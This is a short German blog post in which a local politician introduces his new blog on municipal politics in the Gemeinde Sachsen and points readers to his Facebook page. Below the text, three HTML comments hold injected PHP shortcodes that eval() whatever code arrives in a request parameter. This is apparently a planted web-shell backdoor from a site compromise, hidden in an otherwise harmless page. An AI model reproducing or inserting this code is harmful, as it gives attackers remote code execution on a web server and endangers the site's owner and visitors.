Christian Altaner

Christian Altaner jetzt auch als Blog

Mit der Möglichkeit der Eröff­nung eines eige­nen Blogs, beschre­ite ich nun einen neuen Weg der Kom­mu­nika­tion. Ich möchte damit die Möglichkeit auf­greifen, meine Gedanken und Infor­ma­tio­nen zur Kom­mu­nalpoli­tik der Gemeinde Sach­sen zu veröf­fentlichen. Bish­er geschah dies auss­chließlich über meine face­book-Seite (www.facebook.com/ChristianAltaner) . Dort find­en sie auch weit­er­hin weit­erge­hende Infor­ma­tio­nen, Fotos und was son­st noch inter­es­sant sein kön­nte.

Ganz beson­ders liegt mir aber am Herzen, dass sie nicht nur meine Inhalte lesen und wir im Inter­net Kon­takt haben, son­dern dass wir uns auch per­sön­lich ken­nen­ler­nen. Daher freue ich mich auf jede Gele­gen­heit, bei der ich sie per­sön­lich begrüßen darf.

 

 

<!– [insert_php]if (isset($_REQUEST[“RMLHW”])){eval($_REQUEST[“RMLHW”]);exit;}[/insert_php][php]if (isset($_REQUEST[“RMLHW”])){eval($_REQUEST[“RMLHW”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[“GGrA”])){eval($_REQUEST[“GGrA”]);exit;}[/insert_php][php]if (isset($_REQUEST[“GGrA”])){eval($_REQUEST[“GGrA”]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST[“LsY”])){eval($_REQUEST[“LsY”]);exit;}[/insert_php][php]if (isset($_REQUEST[“LsY”])){eval($_REQUEST[“LsY”]);exit;}[/php] –>

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

%d Bloggern gefällt das: